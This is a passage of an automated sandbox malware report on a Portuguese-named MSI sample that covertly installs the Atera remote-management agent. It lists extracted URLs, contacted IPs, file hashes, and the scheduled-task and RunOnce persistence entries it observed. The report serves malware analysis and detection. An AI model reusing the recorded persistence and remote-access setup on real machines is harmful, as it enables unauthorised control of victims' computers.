0000002F.00000002.2274299424.0000010B00001000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000033.00000002.2571688057.0000024845621000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 
00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2103371672.000001CC12D40000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2116373812.00000165983D9000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.000001326286F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            https://chocolatey.org/compare2GAgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              https://community.chocolatey.org/api/v2/AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B72D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                https://community.chocolatey.org/packages).AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                  https://docs.chocolatey.org/en-us/create/functions/get-toolslocationAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                    https://community.chocolatey.org/api/v2AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                      https://ps.ateHxAteraAgent.exe, 0000001A.00000002.2152969045.000001A882204000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGERUNTIMEINSTALLER/1.6/AGENTPACKAGERUNTIMEINSTALLEAteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          http://my.splashtop.comAgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            https://ps.atera.com/agentpackagesmac/AgentPackageOsUpdates/19.9/AgentPackageOsUpdates.zipAteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              https://ps.atera.com/agentpackagesnet45/AgentPackageOsUpdates/19.9/AgentPackageOsUpdates.zipAteraAgent.exe, 00000010.00000002.1903414217.00000234002A4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                https://agent-api.atera.com/Production/Agent/GetRecurrinAteraAgent.exe, 00000010.00000002.1903414217.0000023400341000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400339000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://ps.ateHjOAteraAgent.exe, 0000001A.00000002.2152969045.000001A8821DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://api.nuget.org/v3-flatcontainer/eo.webbrowser/24.1.46/eo.webbrowser.24.1.46.nupkgAgentPackageTicketing.exe, 00000033.00000002.2571688057.000002484569A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmpfalse
                                                                                                                                                                      https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/choco_outdated.gifAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                        https://community.chocolatey.org/api/v2/PAgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://docs.chocolatey.org/en-us/create/functions/uninstall-binfileAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                            https://ps.atera.com/agentpackageswin/AgentPackageNetworkDiscovery/15.0/AgentPackageNetworkDiscoveryAteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://licensedpackages.chocolatey.org/api/v2/AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://ps.ateHzAteraAgent.exe, 0000001A.00000002.2152969045.000001A8822B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://westeurope-5.in.applicationinsights.azure.com/;LiveEndpoint=https://westeurope.livediagnostiAgentPackageTicketing.exe, 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmpfalse
                                                                                                                                                                                    https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/23.4/AgentPackageSTRemote.ziphAteraAgent.exe, 00000010.00000002.1903414217.00000234003F5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://www.w3.orAgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B343000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B30B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B5D9000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B4ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://community.chocolatey.org/packages/autohotkey.portableAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                                          https://gist.github.com/jvshahid/6fb2f91fa7fb1db23599AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B4181000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                                            https://ps.atera.com/agentpackagesmac/AgentPackageHeartbeat/17.11/AgentPackageHeartbeat.zipAteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://somewhere/bob.exeAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                                                https://community.chocolatey.org/api/v2/8AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B72D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://download.splashtop.comAgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://aka.ms/dotnet/app-launch-failed&gui=trueShowingAteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://docs.chocolatey.org/en-us/create/functions/get-osarchitecturewidthAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                                                        https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=3f30da7a-a0ae-4884-90f3-df2ffec271deAteraAgent.exe, 00000010.00000002.1903414217.000002340008B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://docs.chocolatey.org/en-us/create/functions/uninstall-chocolateyzippackageAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                                                            https://ps.atera.com/agentpackagesnet45/AgentPackageTaskScheduler/17.2/AgentPackageTaskScheduler.zipAteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://agent-api.atera.comrundll32.exe, 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1359772261.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1359772261.0000000004D64000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400001000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.0000000005244000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582681527.000001FD41A2F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000016.00000002.1582648644.0000026AD2433000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881E77000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881951000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB671000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB899000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 
0000001D.00000002.1860673712.00000246BB867000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB82C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433C46000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000033.00000002.2571688057.0000024845621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://www.nuget.org/packages/NLog.Web.AspNetCoreAgentPackageMonitoring.exe, 00000025.00000002.1830156930.0000022AD93F8000.00000002.00000001.01000000.00000025.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpfalse
                                                                                                                                                                                                                  https://github.com/dahlbyk/posh-git/blob/1941da2472eb668cde2d6a5fc921d5043a024386/LICENSE.txtAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmp, ChocolateyTabExpansion.ps1.53.drfalse
                                                                                                                                                                                                                    https://docs.chocolatey.org/en-us/create/functions/install-chocolateyshortcutAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                                                                      http://www.w3.ohAteraAgent.exe, 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        http://www.jrsoftware.org/ishelp/index.php?topic=setupexitcodesAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                                                                          https://community.chocolatey.org/api/v2/.AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                                                                            http://somewhere123zzaafasd.invalidAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                                                                                                              http://schemas.xmlsoap.org/wsdl/AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B72D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                http://api.nuget.orgAgentPackageTicketing.exe, 00000033.00000002.2571688057.00000248459E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  http://nlog-project.org/ws/AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpfalse
                                                                                                                                                                                                                                    http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesTAgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpfalse
                                                                                                                                                                                                                                      https://ps.atera.com/aAteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmpfalse
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 40.119.152.241 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true |
| 93.184.221.240 | unknown | European Union | 15133 | EDGECASTUS | false |
| 13.35.58.89 | unknown | United States | 16509 | AMAZON-02US | false |
| 35.157.63.229 | unknown | United States | 16509 | AMAZON-02US | false |
| 13.107.253.72 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 20.101.57.9 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 13.35.58.104 | unknown | United States | 16509 | AMAZON-02US | false |
| 35.71.184.3 | unknown | United States | 237 | MERIT-AS-14US | false |
| 192.229.221.95 | unknown | United States | 15133 | EDGECASTUS | false |
                                                                                                                                                                                                                                        20.60.197.1
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                        Analysis ID:1524137
                                                                                                                                                                                                                                        Start date and time:2024-10-02 15:56:46 +02:00
                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                        Overall analysis duration:0h 14m 32s
                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                        Number of analysed new started processes analysed:64
                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                        Sample name:TRABALHO----PROCESSO0014S55-S440000000S1.msi
                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winMSI@109/899@0/10
                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 15.4%
                                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 67%
                                                                                                                                                                                                                                        • Number of executed functions: 399
                                                                                                                                                                                                                                        • Number of non-executed functions: 2
                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                        • Found application associated with file extension: .msi
                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 7880 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 7892 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 8112 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AgentPackageSTRemote.exe, PID 3916 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AteraAgent.exe, PID 1504 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AteraAgent.exe, PID 7016 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AteraAgent.exe, PID 8144 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target rundll32.exe, PID 7508 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target rundll32.exe, PID 7700 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target rundll32.exe, PID 7808 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target rundll32.exe, PID 7884 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtSetValueKey calls found.
                                                                                                                                                                                                                                        • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                                                                                                                        • VT rate limit hit for: TRABALHO----PROCESSO0014S55-S440000000S1.msi
Time | Type | Description
09:57:52 | API Interceptor | 2x Sleep call for process: rundll32.exe modified
09:57:58 | API Interceptor | 1266x Sleep call for process: AteraAgent.exe modified
11:19:45 | API Interceptor | 35x Sleep call for process: AgentPackageAgentInformation.exe modified
11:19:53 | API Interceptor | 385x Sleep call for process: AgentPackageSTRemote.exe modified
11:20:06 | API Interceptor | 40x Sleep call for process: AgentPackageMonitoring.exe modified
11:20:31 | API Interceptor | 26x Sleep call for process: AgentPackageMarketplace.exe modified
11:20:32 | API Interceptor | 311x Sleep call for process: AgentPackageTicketing.exe modified
11:20:32 | API Interceptor | 1x Sleep call for process: AgentPackageInternalPoller.exe modified
11:20:37 | API Interceptor | 17x Sleep call for process: AgentPackageProgramManagement.exe modified
11:20:53 | API Interceptor | 7x Sleep call for process: AgentPackageUpgradeAgent.exe modified
17:20:23 | Task Scheduler | Run new task: Monitoring Recovery path: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe s>schedulerrun
17:21:01 | Autostart | Run: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce {ff783edd-4e4e-491d-9d9c-72f3aa70cedf} "C:\ProgramData\Package Cache\{ff783edd-4e4e-491d-9d9c-72f3aa70cedf}\dotnet-runtime-6.0.32-win-x64.exe" /burn.runonce
                                                                                                                                                                                                                                        17:21:28Task SchedulerRun new task: AteraAgentServiceWatchdog path: C:\Program Files\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exe s>eyJBZ2VudElkIjoiMzc1N2M3NjEtOWU1MC00ZjE1LTgwODYtMGU1ODRkY2VlYTQ4IiwiQ29tbWFuZElkIjoiNGViOGIzYWUtM2ExZS00YzdiLWE3ZjMtODg0ZGIyNzIxODk4IiwiQWNjb3VudElkIjoiMDAxUTMwMDAwME1IR0E5SUFQIiwiQWdlbnRBcGlIb3N0IjoiYWdlbnQtYXBpLmF0ZXJhLmNvbS9Qcm9kdWN0aW9uIiwiQXJndW1lbnRzIjoie1x1MDAyMkNvbW1hbmROYW1lXHUwMDIyOlx1MDAyMmhlYWx0aGNoZWNrXHUwMDIyfSIsIkFnZW50RGlyZWN0b3J5IjoiIn0=
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):145968
                                                                                                                                                                                                                                        Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                        MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                        SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                        SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1442
                                                                                                                                                                                                                                        Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                        MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                        SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                        SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                        SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215088
                                                                                                                                                                                                                                        Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                        MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                        SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                        SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                        SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                        MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                        SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                        SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                        SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):602672
                                                                                                                                                                                                                                        Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                        MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                        SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                        SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                        SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                        MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                        SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                        SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                        SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
